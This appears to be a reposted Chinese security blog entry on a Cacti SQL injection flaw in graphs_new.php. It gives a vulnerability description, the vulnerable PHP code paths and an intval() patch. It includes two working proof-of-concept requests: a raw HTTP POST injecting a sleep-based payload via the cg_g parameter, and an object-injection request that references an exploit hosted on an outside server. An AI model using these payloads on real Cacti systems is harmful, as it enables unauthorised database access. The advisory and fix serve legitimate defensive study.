2. 程式人生 > >cacti後臺SQL註入漏洞 --解決

cacti後臺SQL註入漏洞 --解決

阿新 發佈:2019-03-12
templates abi agent ted 外部 eat kit Language view 

   cacti後臺SQL註入漏洞

   簡介
   cacti後臺SQL註入漏洞
   cacti /graphs_new.php中對$_POST["cg_g"]參數過濾不嚴,導致SQL註入的發生,可能導致敏感數據泄漏。

    解決方法在第4步

1. 漏洞描述

  other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

  Relevant Link:

  http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞觸發條件

  0x1: POC1: SQL Inject

  復制代碼
  POST /cacti/graphs_new.php HTTP/1.1
  Host: 192.168.217.133
  Proxy-Connection: keep-alive
  Cache-Control: max-age=0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Origin: http://192.168.217.133 [^]
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
  Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
  Content-Length: 189

  __csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save
  復制代碼
  0x2: POC2: Object Inject

  1. Login
  2. POST  http://target/cacti/graphs_new.php
     Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]
      {Injection exp can be found on my server: http://pandas.pw/cacti.exp}
  3. mysql log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--

3. 漏洞代碼分析

  0x1: Vuls-1: Object Inject To SQL Inject

  /graphs_new.php

  復制代碼
  /* set default action */
  if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
  switch ($_REQUEST["action"]) {
      case ‘save‘:
          //track function form_save
          form_save();

          break;
      case ‘query_reload‘:
          host_reload_query();

          header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
          break;
      default:
          include_once("./include/top_header.php");

          graphs();

          include_once("./include/bottom_footer.php");
          break;
  }
  復制代碼
  form_save();

  復制代碼
  function form_save() 
  {
      ..
      if (isset($_POST["save_component_new_graphs"])) 
      {
          //Track function host_new_graphs_save()
          host_new_graphs_save();

          header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
      }
  }
  復制代碼
  host_new_graphs_save();

  復制代碼
  function host_new_graphs_save() 
  {
      //variable $selected_graphs_array just unserialized the POST variable which we can control without filter.
      $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
      ..
      //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.
      $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
      ..
  }
  復制代碼
  0x2: Vuls-2: SQL Injection

  復制代碼
  function form_save() 
  {
      if (isset($_POST["save_component_graph"])) 
      {
          /* summarize the ‘create graph from host template/snmp index‘ stuff into an array */
          while (list($var, $val) = each($_POST)) 
          {
              if (preg_match(‘/^cg_(\d+)$/‘, $var, $matches)) 
              {
                  $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
              }
              //cg_g is not filtered
              elseif (preg_match(‘/^cg_g$/‘, $var)) 
              {
                  if ($_POST["cg_g"]    0) 
                  {
                      $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                  }
              }
              elseif (preg_match(‘/^sg_(\d+)_([a-f0-9]{32})$/‘, $var, $matches)) 
              {
                  $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
              }
          }

          if (isset($selected_graphs)) 
          {
              //外部輸入參數帶入host_new_graphs中
              host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
              exit;
          }

          header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
      }

      if (isset($_POST["save_component_new_graphs"])) {
          host_new_graphs_save();

          header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
      }
  }
  復制代碼
  host_new_graphs(POST["hostid"],_POST["host_template_id"], $selected_graphs);

  復制代碼
  function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
      /* we use object buffering on this page to allow redirection to another page if no
      fields are actually drawn */
      ob_start();

      include_once("./include/top_header.php");

      print "<form method=‘post‘ action=‘graphs_new.php‘  \n";

      $snmp_query_id = 0;
      $num_output_fields = array();

      while (list($form_type, $form_array) = each($selected_graphs_array)) {
          while (list($form_id1, $form_array2) = each($form_array)) {
              if ($form_type == "cg") {
                  //sql injection in graph_template_id 
                  $graph_template_id = $form_id1; 

                  html_start_box("<strong  Create Graph from ‘" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "‘", "100%", "", "3", "center", "");
  復制代碼
  Relevant Link:

  http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt
  http://bugs.cacti.net/view.php?id=2652

4. 防禦方法

  /graphs_new.php

  復制代碼
  function host_new_graphs_save() 
  {
      ..
      /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/         --註釋
      $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));      --添加
      ..
  }
  復制代碼
  /graphs_new.php

  復制代碼
  function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
      /* we use object buffering on this page to allow redirection to another page if no
      fields are actually drawn */
      ob_start();

      include_once("./include/top_header.php");

      print "<form method=‘post‘ action=‘graphs_new.php‘  \n";

      $snmp_query_id = 0;
      $num_output_fields = array();

      while (list($form_type, $form_array) = each($selected_graphs_array)) {
          while (list($form_id1, $form_array2) = each($form_array)) {
              if ($form_type == "cg") {
                  //sql injection in graph_template_id 
                  $graph_template_id = $form_id1; 
                  /**/
                  $graph_template_id = intval($graph_template_id);
                  /**/
                  html_start_box("<strong  Create Graph from ‘" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "‘", "100%", "", "3", "center", "");
  復制代碼
  Relevant Link:

  http://www.cacti.net/download_cacti.php

cacti後臺SQL註入漏洞 --解決

相關推薦

cacti後臺SQL漏洞 --解決

templates abi agent ted 外部 eat kit Language view cacti後臺SQL註入漏洞 簡介 cacti後臺SQL註入漏洞 cacti /graphs_new.php中對$_POST["cg_g"]參數過濾不

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

ourphp 最新版(v1.7.3) 後臺sql

http dmi client app conf agen 9.png 系統 sql語句 version:<?php /*************************************************************************

【安全牛學習筆記】初識sql漏洞原理

信息安全 sql security+ 網站沒有對輸入的字符進行過濾,導致輸入的字符影響到網站數據的查詢。編程 數學邏輯思維 and or xor 且 或 否 或:有一個真就是真 且:有一個假就為假 否:相反怎麽找是否有註入漏洞? 第一個找符合參數鏈接的網站

三、ADO.Net基礎【05】SQL漏洞(SQLInjection)

字符串 大於 拼接 匹配 常用 ado 執行 註入漏洞 基礎 使用字符串拼接的方式把sql語句所需參數拼接到將要執行的sql語句中(參數一般只sql語句的過濾條件),對於用戶的惡意輸入可能導致不一的查詢結果 例如:一個登錄的例子(UserName和Password是用戶的輸

SQL漏洞的分析與利用(一)

ces mysql 得出 必須 排序 快速搭建 oracle 學習筆記 min SQL註入的核心思想 黑客在正常的需要調用數據庫的URL後面構造一段數據庫查詢代碼,然後根據返回的結果,從而獲得想要的某些數據。SQL結構化查詢語言,絕大多數關系型數據庫(MySQL、Acces

SQL漏洞的分析與利用(二)

manage 如果 得到 nio 學習筆記 sql註入 .com 密碼 vpd Access手工註入 1.實驗環境:實驗平臺:小旋風ASPWeb服務器目標網站:南方數據2.02.打開網站,隨意點開一個頁面看到?id=4說明有參數傳遞,用的是get方法,可能是一個註入點加入判

SQL漏洞的分析與利用(三)

和數 form 打開 用戶 data 用戶名 text 必須 存儲 MySQL數據庫: 元數據庫information_schema1.在5.0以後版本的MySQL中存在著一個元數據庫information_schema,其中存儲著用戶在MySQL中創建的所有其他數據庫的信

[Js-JDBC]SQL解決,Statement與PreparedStatement

接收 現象 dsta ets 字符 如何 sel 單引號 con SQL註入的含義 用戶在輸入信息中有SQL關鍵字並且參與SQL語句的編譯,導致SQL語句含義扭曲,這種現象被稱為SQL註入 例如: 1 // 在登錄驗證的時候使用如下語句 2 String sql = "s

ref:ThinkPHP Builder.php SQL漏洞(<= 3.2.3)

syntax tle AR turn sql註入 cat 類型 times execute ThinkPHP Builder.php SQL註入漏洞(<= 3.2.3) ref:https://www.jianshu.com/p/18d06277161e TimeSH

Zabbix sql漏洞腳本執行反彈shell

腳本執行 ucc shell UC 編寫 密碼 我們 zabbix 執行 exp檢測是否存在SQL註入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------

網站漏洞修復方案防止SQL×××漏洞

單引號 註入漏洞 很多 api 影響 數值 簡單 HP 存在 SQL註入漏洞在網站漏洞裏面屬於高危漏洞,排列在前三,受影響範圍較廣,像asp、.net、PHP、java、等程序語言編寫的代碼,都存在著sql註入漏洞,那麽如何檢測網站存在sql註入漏洞? SQL註入漏洞測試方

網站如何防止sql×××的解決辦法

網站開發 安全行業 場景 nosql 腳本文件 blog mon gen vpd 首先我們來了解下什麽是SQL註入,SQL註入簡單來講就是將一些非法參數插入到網站數據庫中去,執行一些sql命令,比如查詢數據庫的賬號密碼,數據庫的版本,數據庫服務器的IP等等的一些操作,sql

怎麽修復網站漏洞之metinfo遠程SQL漏洞修補

導致 腳本 mark 技術分享 -o 詳情 報告 過濾 新版本 2018年11月23日SINE網站安全檢測平臺,檢測到MetInfo最新版本爆出高危漏洞,危害性較大,影響目前MetInfo 5.3版本到最新的 MetInfo 6.1.3版本,該網站漏洞產生的主要原因是Met

discuzX3.2 X3.4網站漏洞修復 SQL漏洞修復

比較 class linux c php環境 數據 如何 127.0.0.1 由於 效果 2018年12月9日,國內某安全組織,對discuz X3.2 X3.4版本的漏洞進行了公開,這次漏洞影響範圍較大,具體漏洞是discuz 的用戶前段SQL註入與請求偽造漏洞,也俗稱×

SQL漏洞總結

php 自己 用戶 5.7 定義 註意 3.2 cap url 目錄: 一、SQL註入漏洞介紹 二、修復建議 三、通用姿勢 四、具體實例 五、各種繞過 一、SQL註入漏洞介紹: SQL註入攻擊包括通過輸入數據從客戶端插入或“註入”SQL查詢到應用程序。一個成

web安全—sql漏洞

關於 style union 原理 lec 包括 視圖 16進制 如果 SQL註入-mysql註入 一.普通的mysql註入 MySQL註入不像註入access數據庫那樣,不需要猜。從mysql5.0以上的版本,出現一個虛擬的數據庫,即:information_sch

【安全牛學習筆記】手動漏洞挖掘-SQL

security+ 漏洞 信息安全 手動漏洞挖掘-----SQL註入無權讀取information_schema庫 / 拒絕union、orderby語句 猜列明: ‘and column is null--+ Burp suite自動猜列名 猜當前表表名: ‘and

記錄一次網站漏洞修復過程(三):第二輪處理(攔截SQL、跨站腳本攻擊XSS)

cat nbsp ebe 嵌入 網頁 防止 記錄 用戶輸入 light 在程序編寫的時候采用參數化的SQL語句可以有效的防止SQL註入,但是當程序一旦成型,再去修改大量的數據庫執行語句並不是太現實,對網頁表單上輸入進行校驗是易於實現的方法。在webForm 頁面中開啟校驗屬

優客365 v2.9版本 後臺存在SQL

-- src login php ima 分享 format cnblogs mod 安裝 打開後臺登陸界面 http://localhost:9096/yk365/system/login.php 輸入單引號報錯 得到表名 經過跟蹤後在\modul